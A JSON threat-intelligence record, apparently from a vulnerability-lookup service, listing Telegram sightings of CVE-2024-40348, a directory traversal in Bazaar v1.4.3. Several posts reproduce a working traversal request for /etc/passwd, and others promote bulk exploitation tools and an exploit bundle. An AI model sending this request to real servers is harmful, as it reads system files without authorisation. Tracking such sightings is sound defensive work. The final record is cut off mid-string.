{"vulnerability": "CVE-2024-40348", "sightings": [{"uuid": "3e0465ff-45a0-4a00-b76b-89971f6fb6ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8069", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMass Exploit < [CVE-2024-40348 - Bazarr] - Arbitrary File Read\nURL\uff1ahttps://github.com/codeb0ss/CVE-2024-40348-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-24T16:15:53.000000Z"}, {"uuid": "e64efb2f-6b86-4745-9327-73d99ec60779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8035", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-40348. Will attempt to read /etc/passwd from target\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-40348\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-21T00:57:10.000000Z"}, {"uuid": "8fe8a14d-ef40-4b3a-a1c7-990972e4354b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/3301", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2025-03-16T00:41:48.000000Z"}, {"uuid": "c55cb8d7-05e8-40b3-9484-3d6f60ea3799", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9525", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aBazaar v1.4.3 \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e(CVE-2024-40348)\nURL\uff1ahttps://github.com/NingXin2002/Bazaar_poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-20T09:52:46.000000Z"}, {"uuid": "579b76df-fdfd-4bf7-bcc7-f432050fb570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1542", "content": "CVE-2024-40348\n\nGET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\n\netc/passwd", "creation_timestamp": "2024-07-26T13:23:37.000000Z"}, {"uuid": "be91a71d-4ac1-47b5-8439-7ee4907e2748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/14880", "content": "CVE-2024-40348\n\nGET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\n\netc/passwd", "creation_timestamp": "2024-07-26T13:23:37.000000Z"}, {"uuid": "72a7b4af-d784-4788-9877-be6e7fd17bd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/14736", "content": "https://github.com/bigb0x/CVE-2024-40348\n\nPOC for CVE-2024-40348. Will attempt to read /etc/passwd from target", "creation_timestamp": "2024-07-25T15:46:19.000000Z"}, {"uuid": "e4e71694-7ef8-43a0-8af5-c9f34ea55b5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "Telegram/iNesZUyhDguFczeaL5Zt77EzAav3F9OxfYhSBP9z3gLXig", "content": "", "creation_timestamp": "2024-07-26T10:35:57.000000Z"}, {"uuid": "5f25ae79-4bf5-4023-aaaf-9e2803ad7e90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1428", "content": "https://github.com/bigb0x/CVE-2024-40348\n\nPOC for CVE-2024-40348. Will attempt to read /etc/passwd from target", "creation_timestamp": "2024-07-25T15:46:19.000000Z"}, {"uuid": "8a6ee9f7-e3fe-4f75-bc77-ad5f005caeb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/19", "content": "CVE-2024-40348\n\nGET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\n\netc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-07-26T14:22:24.000000Z"}, {"uuid": "3af364e4-5938-4db3-bf60-5af3c3c53ad9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "seen", "source": "https://t.me/cvedetector/1241", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-40348 - Apache Bazaar SwaggerUI Directory Traversal Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-40348 \nPublished : July 20, 2024, 4:15 a.m. | 36\u00a0minutes ago \nDescription : An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-20T07:15:32.000000Z"}, {"uuid": "67507d62-43e1-486f-85d1-16cb229c8778", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/17", "content": "https://github.com/bigb0x/CVE-2024-40348\n\nPOC for CVE-2024-40348. Will attempt to read /etc/passwd from target\n#github #poc", "creation_timestamp": "2024-07-26T14:22:24.000000Z"}, {"uuid": "214eb526-124e-441f-8200-f80b07e97f76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/596", "content": "CVE-2024-40348\n\nGET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\n\netc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-07-26T15:19:43.000000Z"}, {"uuid": "681b23e2-7fed-4379-a27a-cee6c82d4dd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/592", "content": "#exploit\n1. CVE-2024-40348:\nUnauth directory traversal in Bazaar 1.4.3\nhttps://github.com/bigb0x/CVE-2024-40348\n\n2. CVE-2024-39907:\nSQLi in Linux 1Panel\nhttps://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6", "creation_timestamp": "2024-07-26T05:11:20.000000Z"}, {"uuid": "699ae5ce-db05-44d1-a965-d71f02c3b9c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "exploited", "source": "https://t.me/TheDarkWebInformer/1822", "content": "\ud83d\udea8PoC for CVE-2024-40348 has been spotted in the wild\n\nhttps://darkwebinformer.com/poc-for-cve-2024-40348-has-been-spotted-in-the-wild/\n\nbigb0x describes it as a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.\n\nX: @MohamedNab1l\nLinkedIn: in/mnabilali\nWebsite: wibbic[.]com\n\nhttps://github.com/bigb0x/CVE-2024-40348", "creation_timestamp": "2024-07-22T00:20:35.000000Z"}, {"uuid": "7c19290e-3263-4d80-8c2f-5822bbe28485", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/454", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-07T16:14:23.000000Z"}, {"uuid": "572c7a88-75c0-4b0e-bf71-9b125290ca75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/leak503/506", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-02T21:35:26.000000Z"}, {"uuid": "b8de8493-d7fa-420d-9332-a36d5cdf1e9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "Telegram/XpvaFCWqDdhczMpL78DIu7UwbRt1BfqFLpK3OfazzKgSSlAyeg", "content": "", "creation_timestamp": "2024-08-31T12:29:12.000000Z"}, {"uuid": "109a5330-0af6-4381-8ff4-59d4899a9024", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8598", "content": "Tools - Hackers Factory \n\nApepe - Mobile application\u00a0 pentesting\n\nApepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...\n\ngithub.com/oppsec/Apepe\n\nBest App For Sql Injection\n\nhttps://github.com/darknethaxor/DH-HackBar\n\nBBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.\n\nhttps://github.com/honoki/bbrf-client/\n\nCVE-2024-40348 \n\nThis is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nIt is a free and open-source tool used for image steganography, specifically for extracting hidden data from images. \n\nhttps://github.com/spipm/Depix \n\nDiscover more subdomains during your recon by extracting subdomains from TLS certificates. Integrate Cero into your recon automation for better results.\n\nhttps://github.com/glebarez/cero\n\nCRLFsuite - CRLF injection scanner \n\nThe most powerful CRLF injection (HTTP Response Splitting) scanner.\u00a0 \nhttps://github.com/Raghavd3v/CRLFsuite\n\nFound a subdomain running on Symfony debug mode. \n\nhttps://github.com/synacktiv/eos to get PHP variables and a lot more. \n\nTrying to find Origin IP check out this tool created to find IP behind WAF\nhttps://github.com/mmarting/unwaf \n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-13T01:42:51.000000Z"}, {"uuid": "d2cf5642-dc68-411f-9c82-fb6be44bb8f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/467", "content": "Tools - Hackers Factory \n\nAmoloHT/TTWAF: \u300c\ud83e\uddf1\u300dTest a list of payloads and see if you can bypass it.\n\nhttps://github.com/AmoloHT/TTWAF\n\nOWASP/www-project-netryx: Next level Java web security framework. \n\nhttps://github.com/OWASP/www-project-netryx\n\nPrivFu/TokenAssignor at main daem0nc0re/PrivFu.\n\nhttps://github.com/daem0nc0re/PrivFu/tree/main/TokenAssignor\n\nRPISEC/MBE: Course materials for Modern Binary Exploitation by RPISEC\n\nhttps://github.com/RPISEC/MBE\n\nBigb0x/CVE-2024-40348: POC for CVE-2024-40348. Will attempt to read /etc/passwd from target\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nPumpbin/pumpbin: \ud83c\udf83 PumpBin is an Implant Generation Platform.\n\nhttps://github.com/pumpbin/pumpbin\n\nBellingcat/name-variant-search: A tool for searching common variations of a human name\n\nhttps://github.com/bellingcat/name-variant-search\n\nMegadose/nqntnqnqmb: Allows you to retrieve information on linkedin profiles, companies on linkedin and search on linkedin companies/persons\n\nhttps://github.com/megadose/nqntnqnqmb\n\nThis cheat sheet contains common enumeration and attack methods for Windows Active Directory with the use of powershell.\n\nhttps://github.com/drak3hft7/Cheat-Sheet---Active-Directory\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-24T06:19:12.000000Z"}, {"uuid": "401933d8-15d7-4be0-a5e5-6d008021a61a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/453", "content": "This is a bulk scanning and exploitation tool for CVE-2024-40348, Bazaar v1.4.3 and prior. Will attempt to read /etc/passwd from target.\n\nhttps://github.com/bigb0x/CVE-2024-40348", "creation_timestamp": "2024-07-22T21:17:55.000000Z"}, {"uuid": "9092b746-8752-4475-ac62-9caa7149b8c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/662", "content": "Tools - Hackers Factory \n\nApepe - Mobile application  pentesting\n\nApepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...\n\ngithub.com/oppsec/Apepe\n\nBest App For Sql Injection\n \nhttps://github.com/darknethaxor/DH-HackBar\n\nBBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.\n \nhttps://github.com/honoki/bbrf-client/\n\nCVE-2024-40348 \n\nThis is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.\n \nhttps://github.com/bigb0x/CVE-2024-40348\n\nIt is a free and open-source tool used for image steganography, specifically for extracting hidden data from images. \n \nhttps://github.com/spipm/Depix \n\nDiscover more subdomains during your recon by extracting subdomains from TLS certificates. Integrate Cero into your recon automation for better results.\n\nhttps://github.com/glebarez/cero\n\nCRLFsuite - CRLF injection scanner \n\nThe most powerful CRLF injection (HTTP Response Splitting) scanner.  \n https://github.com/Raghavd3v/CRLFsuite\n\nFound a subdomain running on Symfony debug mode. \n\nhttps://github.com/synacktiv/eos to get PHP variables and a lot more. \n\nTrying to find Origin IP check out this tool created to find IP behind WAF\n \nhttps://github.com/mmarting/unwaf \n \n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-13T01:51:37.000000Z"}, {"uuid": "153c9ab6-16a6-45c8-8f4e-bde262426828", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8312", "content": "Tools - Hackers Factory \n\nAmoloHT/TTWAF: \u300c\ud83e\uddf1\u300dTest a list of payloads and see if you can bypass it.\n\nhttps://github.com/AmoloHT/TTWAF\n\nOWASP/www-project-netryx: Next level Java web security framework. \n\nhttps://github.com/OWASP/www-project-netryx\n\nPrivFu/TokenAssignor at main daem0nc0re/PrivFu.\n\nhttps://github.com/daem0nc0re/PrivFu/tree/main/TokenAssignor\n\nRPISEC/MBE: Course materials for Modern Binary Exploitation by RPISEC\n\nhttps://github.com/RPISEC/MBE\n\nBigb0x/CVE-2024-40348: POC for CVE-2024-40348. Will attempt to read /etc/passwd from target\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nPumpbin/pumpbin: \ud83c\udf83 PumpBin is an Implant Generation Platform.\n\nhttps://github.com/pumpbin/pumpbin\n\nBellingcat/name-variant-search: A tool for searching common variations of a human name\n\nhttps://github.com/bellingcat/name-variant-search\n\nMegadose/nqntnqnqmb: Allows you to retrieve information on linkedin profiles, companies on linkedin and search on linkedin companies/persons\n\nhttps://github.com/megadose/nqntnqnqmb\n\nThis cheat sheet contains common enumeration and attack methods for Windows Active Directory with the use of powershell.\n\nhttps://github.com/drak3hft7/Cheat-Sheet---Active-Directory\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-24T08:32:41.000000Z"}, {"uuid": "6fd00aa8-9bcf-485f-8da9-c4d04106161b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "Telegram/3v_L1Km8kHglM99z9Gx-p2lsvnYIaRU3JVXDXxZhsRyM6xs7", "content": "", "creation_timestamp": "2024-08-31T12:42:28.000000Z"}, {"uuid": "1435ab25-6782-4295-a4dc-20d96f458333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3669", "content": "Tools - Hackers Factory \n\nApepe - Mobile application\u00a0 pentesting\n\nApepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...\n\ngithub.com/oppsec/Apepe\n\nBest App For Sql Injection\n\nhttps://github.com/darknethaxor/DH-HackBar\n\nBBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.\n\nhttps://github.com/honoki/bbrf-client/\n\nCVE-2024-40348 \n\nThis is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nIt is a free and open-source tool used for image steganography, specifically for extracting hidden data from images. \n\nhttps://github.com/spipm/Depix \n\nDiscover more subdomains during your recon by extracting subdomains from TLS certificates. Integrate Cero into your recon automation for better results.\n\nhttps://github.com/glebarez/cero\n\nCRLFsuite - CRLF injection scanner \n\nThe most powerful CRLF injection (HTTP Response Splitting) scanner.\u00a0 \nhttps://github.com/Raghavd3v/CRLFsuite\n\nFound a subdomain running on Symfony debug mode. \n\nhttps://github.com/synacktiv/eos to get PHP variables and a lot more. \n\nTrying to find Origin IP check out this tool created to find IP behind WAF\n\nhttps://github.com/mmarting/unwaf \n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-13T01:51:47.000000Z"}, {"uuid": "a6b0c642-48b7-4792-bbfb-296df8051c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3480", "content": "Tools - Hackers Factory \n\nAmoloHT/TTWAF: \u300c\ud83e\uddf1\u300dTest a list of payloads and see if you can bypass it.\n\nhttps://github.com/AmoloHT/TTWAF\n\nOWASP/www-project-netryx: Next level Java web security framework. \n\nhttps://github.com/OWASP/www-project-netryx\n\nPrivFu/TokenAssignor at main daem0nc0re/PrivFu.\n\nhttps://github.com/daem0nc0re/PrivFu/tree/main/TokenAssignor\n\nRPISEC/MBE: Course materials for Modern Binary Exploitation by RPISEC\n\nhttps://github.com/RPISEC/MBE\n\nBigb0x/CVE-2024-40348: POC for CVE-2024-40348. Will attempt to read /etc/passwd from target\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nPumpbin/pumpbin: \ud83c\udf83 PumpBin is an Implant Generation Platform.\n\nhttps://github.com/pumpbin/pumpbin\n\nBellingcat/name-variant-search: A tool for searching common variations of a human name\n\nhttps://github.com/bellingcat/name-variant-search\n\nMegadose/nqntnqnqmb: Allows you to retrieve information on linkedin profiles, companies on linkedin and search on linkedin companies/persons\n\nhttps://github.com/megadose/nqntnqnqmb\n\nThis cheat sheet contains common enumeration and attack methods for Windows Active Directory with the use of powershell.\n\nhttps://github.com/drak3hft7/Cheat-Sheet---Active-Directory\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-24T06:19:22.000000Z"}, {"uuid": "5285c7ee-c526-48d9-a60d-92a495201f00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3472", "content": "This is a bulk scanning and exploitation tool for CVE-2024-40348, Bazaar v1.4.3 and prior. Will attempt to read /etc/passwd from target.\n\nhttps://github.com/bigb0x/CVE-2024-40348", "creation_timestamp": "2024-07-22T18:18:21.000000Z"}, {"uuid": "d7874e42-0453-4cc3-9e11-3de08a42f070", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "Telegram/74IzvRfHv6As3hyVMCWy5rx44qm1MKm9hZLdVsqv0WV9bgP1", "content": "", "creation_timestamp": "2024-10-18T12:26:48.000000Z"}, {"uuid": "941a4e7d-f560-406d-b2b2-9739e90c303a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1520", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-07T05:42:04.000000Z"}, {"uuid": "dbad19dc-5920-45e4-a81e-e8f1b40b2f98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2173", "content": "CVE-2024-40348\n*\nBazaar < v1.4.3 \u043e\u0431\u0445\u043e\u0434 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430\n*\nPOC+scanner\n*", "creation_timestamp": "2024-07-22T05:34:08.000000Z"}, {"uuid": "1dddbba5-35ed-443e-9aaa-099cee6c4c33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "Telegram/yBNsKU3RCbm2WqWC9KEBGcgWBhZoMtEaF28swx96QApDBZY", "content": "", "creation_timestamp": "2024-07-23T06:55:58.000000Z"}, {"uuid": "ee2b1c92-465f-4e51-8031-1acc917d0807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1653", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via 